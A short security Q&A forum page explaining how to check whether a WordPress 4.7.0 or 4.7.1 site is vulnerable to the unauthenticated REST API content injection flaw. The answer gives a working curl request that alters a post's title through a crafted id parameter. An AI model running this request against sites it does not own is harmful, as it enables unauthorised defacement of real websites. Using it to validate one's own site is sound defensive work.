Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

Need any help mail to [email protected]

0 votes
The WordPress version 4.7.0 and 4.7.1 are vulnerable to Content Injection. How can I validate the vulnerability?
by (169 points)

1 Answer

0 votes

Through this vulnerability, an unauthenticated user can modify the content of any post or page. Lets the post id is 1 and you can change the title using this Curl command.

curl 'https://www.example.com/blog/wp-json/wp/v2/posts/1' -X 'POST' -F 'id=1changecontent' -F 'title=Codeshikari' 

If your site is vulnerable then the title of the post id 1 will change to "Codeshikari".

by (269 points)
...